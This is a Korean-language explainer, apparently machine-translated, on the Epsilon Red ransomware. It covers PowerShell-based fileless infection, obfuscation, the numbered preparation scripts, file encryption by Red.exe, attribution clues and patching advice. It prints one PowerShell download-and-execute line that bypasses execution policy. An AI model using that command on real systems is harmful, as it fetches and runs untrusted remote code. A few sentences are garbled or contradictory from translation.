Epsilon Red 랜섬웨어란 무엇입니까?

아직 서버를 패치하셨나요 ?

Epsilon Red라고 불리는 새로운 랜섬웨어 위협은 기업 데이터 센터에 있는 패치가 적용되지 않은 Microsoft 기반 서버를 표적으로 삼습니다. 마블 코믹스에서 잘 알려지지 않은 악당의 이름을 딴 Epsilon Red는 최근 Sophos라는 사이버 보안 회사에 의해 발견되었습니다. 랜섬웨어는 발견된 이후 전 세계의 많은 조직을 공격했습니다.

파일리스 랜섬웨어는 PowerShell에서 "숨겨집니다"

파일리스 랜섬웨어는 합법적인 소프트웨어를 번들로 묶어 실행하는 악성 코드의 한 형태입니다. PowerShell 기반 파일 없는 맬웨어는 PowerShell의 기능을 사용하여 장치 메모리에 직접 로드합니다. 이 기능은 PowerShell 스크립트의 맬웨어가 감지되지 않도록 보호하는 데 도움이 됩니다.

일반적인 시나리오에서는 스크립트가 실행될 때 먼저 장치의 드라이브에 기록되어야 합니다. 이를 통해 엔드포인트 보안 솔루션이 스크립트를 탐지할 수 있습니다. PowerShell은 표준 스크립트 실행 프로세스에서 제외되므로 엔드포인트 보안을 우회할 수 있습니다. 또한 PowerShell 스크립트에서 우회 매개 변수를 사용하면 공격자가 네트워크 스크립트 제한을 우회할 수 있습니다.

PowerShell 우회 매개변수의 예는 다음과 같습니다.

powershell.exe -ep Bypass -nop -noexit -c iex ((New Object.WebClient).DownloadString(‘url’))

보시다시피 PowerShell 우회 매개 변수를 설계하는 것은 비교적 쉽습니다.

이에 대해 Microsoft는 PowerShell과 관련된 원격 맬웨어 실행 취약점을 해결하기 위한 패치를 출시했습니다. 그러나 패치는 사용된 만큼만 효과적입니다. 많은 조직에서는 패치 표준을 완화하여 환경을 공격에 취약하게 만들고 있습니다. Epsilon Red의 디자인은 해당 수준의 취약성을 활용하는 것입니다.

Epsilon Red의 이중 유용성

Epsilon Red는 패치가 적용되지 않은 Microsoft 서버에 가장 효과적이기 때문에 악성 코드가 랜섬웨어 및 식별 도구로 사용될 수 있습니다. Epsilon이 환경에서 성공하는지 여부는 공격자에게 대상의 보안 기능에 대한 더 큰 통찰력을 제공합니다.

Epsilon이 Microsoft Exchange Server에 성공적으로 액세스하면 조직이 일반적인 패치 보안 모범 사례를 따르지 않는다는 의미입니다. 공격자에게 이는 Epsilon이 대상 환경의 나머지 부분을 얼마나 쉽게 손상시킬 수 있는지 보여줍니다.

Epsilon Red는 난독화를 사용하여 페이로드를 숨깁니다. 난독화는 코드를 읽을 수 없게 만들고 PowerShell 스크립트의 높은 가독성을 피하기 위해 PowerShell 맬웨어에 사용됩니다. 난독화를 사용하면 바이러스 백신 소프트웨어가 PowerShell 로그에서 악성 스크립트를 식별하기 어렵게 만드는 데 PowerShell 별칭 cmdlet이 사용됩니다.

Epsilon Red는 패치가 적용되지 않은 Microsoft 서버에 가장 효과적입니다.

그러나 난독화된 PowerShell 스크립트는 계속 식별할 수 있습니다. 임박한 PowerShell 스크립트 공격의 일반적인 징후는 WebClient 개체 생성입니다. 공격자는 악성 코드가 포함된 원격 URL 에 대한 외부 연결을 설정하기 위해 PowerShell 코드에 WebClient 개체를 생성합니다 .

조직이 공격을 받는 경우 난독화된 PowerShell 스크립트를 탐지할 수 있는 충분한 보안 조치가 마련되어 있을 가능성은 매우 낮습니다. 반대로, Epsilon Red가 서버 침투에 실패하면 이는 공격자에게 대상 네트워크가 PowerShell 악성 코드를 빠르게 해독할 수 있다는 것을 알려주므로 공격의 가치가 낮아지고 가치가 높아집니다.

Epsilon Red 사이버 침입

Epsilon Red의 기능은 매우 간단합니다. 이 소프트웨어는 일련의 Powershell 스크립트를 사용하여 서버에 침투합니다. 이러한 PowerShell 스크립트에는 1.ps1 부터 12.ps1 까지 번호가 매겨져 있습니다 . 각 PowerShell 스크립트의 설계는 최종 페이로드를 위한 대상 서버를 준비하는 것입니다.

Epsilon Red의 모든 PowerShell 스크립트에는 고유한 목적이 있습니다. Epsilon Red의 PowerShell 스크립트 중 하나는 대상의 네트워크 방화벽 규칙을 해결하도록 설계되었습니다. 이 시리즈의 또 다른 소프트웨어는 대상의 바이러스 백신 소프트웨어를 제거하도록 설계되었습니다 .

짐작할 수 있듯이 이러한 스크립트는 동기화되어 페이로드가 전달되면 대상이 진행을 빠르게 중지할 수 없도록 합니다.

• Ryuk 랜섬웨어란 무엇인가요? 그것을 피하는 방법?

페이로드 전송

Epsilon의 PowerShell 스크립트가 최종 페이로드를 위해 만들어진 후에는 확장명 Red.exe 로 배포됩니다 . Red.exe는 서버에 들어가면 서버의 파일을 검색하고 검색된 각 파일에 대한 디렉터리 경로 목록을 만듭니다. 목록을 생성한 후 목록의 각 디렉터리 경로에 대해 주요 악성코드 파일에서 하위 프로세스가 생성됩니다. 그런 다음 각 랜섬웨어 하위 파일은 목록 파일의 디렉터리 경로를 암호화합니다.

Epson 목록의 모든 폴더 경로가 암호화되면 대상에게 알리고 공격자의 요청을 명시하기 위해 .txt 파일이 남습니다. 또한 손상된 서버에 연결된 모든 액세스 가능한 네트워크 노드가 손상되고 맬웨어가 네트워크에 침입할 가능성이 높아질 수 있습니다.

엡실론 레드 뒤에는 누가 있나요?

Epsilon Red 배후 공격자의 신원은 아직 알려지지 않았습니다.

Epsilon Red 배후의 공격자의 신원은 아직 알려지지 않았습니다. 그러나 일부 단서는 공격자의 출처를 나타냅니다. 첫 번째 단서는 악성 코드의 이름입니다. Epsilon Red는 러시아 출신의 이야기를 담고 있는 X-Men 악당입니다.

두 번째 단서는 코드가 남긴 .txt 파일의 몸값 메모에 있습니다. REvil이라는 랜섬웨어 집단이 남긴 메모와 유사합니다. 그러나 이러한 유사성이 공격자가 이 갱단의 구성원이었다는 것을 의미하지는 않습니다. REvil은 계열사가 악성 코드에 액세스하기 위해 REvil에 비용을 지불하는 RaaS(Ransomware as a Service) 운영을 운영합니다.

Epsilon Red로부터 자신을 보호하세요

지금까지 Epsilon Red는 패치가 적용되지 않은 서버에 성공적으로 침투했습니다. 이는 Epsilon Red 및 유사한 랜섬웨어 맬웨어에 대한 최선의 보호 중 하나가 환경을 적절하게 관리하는 것임을 의미합니다. 또한, PowerShell 스크립트를 신속하게 해독할 수 있는 보안 솔루션을 갖추는 것은 귀하의 환경에 유용한 추가 기능이 될 것입니다.